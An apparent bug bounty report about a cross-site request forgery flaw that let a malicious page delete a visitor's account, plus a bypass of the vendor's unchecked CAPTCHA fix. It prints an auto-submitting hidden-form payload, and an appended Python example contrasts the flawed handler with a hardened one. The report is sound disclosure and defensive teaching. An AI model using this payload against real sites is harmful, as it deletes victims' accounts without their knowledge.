Cross-site request forgery vulnerability resulting in the deletion of a user's account.
Vulnerability Details
One of the first cross-site request forgery vulnerabilities that I discovered on █████ allowed me to delete an unsuspecting user's account. In order to exploit this issue, I crafted a simple HTML form that sent a POST request to the `/unregister` endpoint when a user loaded the malicious page.
```html
<body onload="document.csrfForm.submit()">
  <form action="https://█████/unregister" method="POST"
        target="hiddenFrame" name="csrfForm">
    <input type="hidden" name="unregister_submit" value="Delete my account" />
  </form>
  <iframe name="hiddenFrame" style="display: none;"></iframe>
</body>
```
The vendor awarded a bounty and subsequently resolved the issue — or so they thought — by adding a CAPTCHA.
The silly thing was, they did not even check to see if the CAPTCHA's result was correct. All you had to do was submit any arbitrary number and the cross-site request forgery vulnerability could still be exploited.
To this day, I have absolutely no clue why the vendor decided to use a CAPTCHA to "fix" this issue.
By the way, I was awarded a bounty for the bypass too. :P
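To show why the CAPTCHA "fix" changed nothing, here is an added example (not the vendor's code, and not part of the original report) that models the `/unregister` handler twice: once as the report describes the fix (a CAPTCHA field that is required but never checked), and once hardened with a per-session anti-CSRF token, an Origin check and real CAPTCHA verification. The `Session`, `Request` and `SITE_ORIGIN` names and the in-memory account set are assumptions for the demonstration.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

SITE_ORIGIN = "https://example.test"  # placeholder for the redacted host

@dataclass
class Session:
    """Hypothetical server-side session (constructed for this example)."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))
    captcha_answer: str = "7"  # constructed: the answer the CAPTCHA expects

@dataclass
class Request:
    """Minimal stand-in for an incoming POST (constructed)."""
    session: Session
    form: dict
    origin: Optional[str] = None  # value of the Origin request header

def unregister_captcha_only(req: Request, accounts: set) -> str:
    """Vendor-style 'fix' as the report describes it: the CAPTCHA field must be
    present, but its value is never compared with the expected answer, so a
    cross-site form that ships any number still deletes the account."""
    if "captcha" not in req.form:
        return "400 missing captcha"
    accounts.discard(req.session.user)
    return "200 deleted"

def unregister_hardened(req: Request, accounts: set) -> str:
    """Same endpoint with the checks that actually stop the attack."""
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return "403 cross-origin"  # browsers send Origin on cross-site POSTs
    # Attacker pages cannot read the victim's token, so it cannot be forged.
    if not hmac.compare_digest(req.form.get("csrf_token", ""), req.session.csrf_token):
        return "403 bad csrf token"
    if not hmac.compare_digest(req.form.get("captcha", ""), req.session.captcha_answer):
        return "400 wrong captcha"
    accounts.discard(req.session.user)
    return "200 deleted"

def cross_site_attempt(handler):
    """Replay the hidden-form attack from the report (constructed input)."""
    accounts, sess = {"victim"}, Session(user="victim")
    req = Request(session=sess, origin="https://attacker.example",
                  form={"unregister_submit": "Delete my account", "captcha": "12345"})
    return handler(req, accounts), "victim" in accounts  # (response, still exists?)
```

`cross_site_attempt(unregister_captcha_only)` deletes the victim, while `cross_site_attempt(unregister_hardened)` is rejected before any state changes.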
Report Stats
- Report ID: 395541
- State: Closed
- Substate: resolved
- Upvotes: 44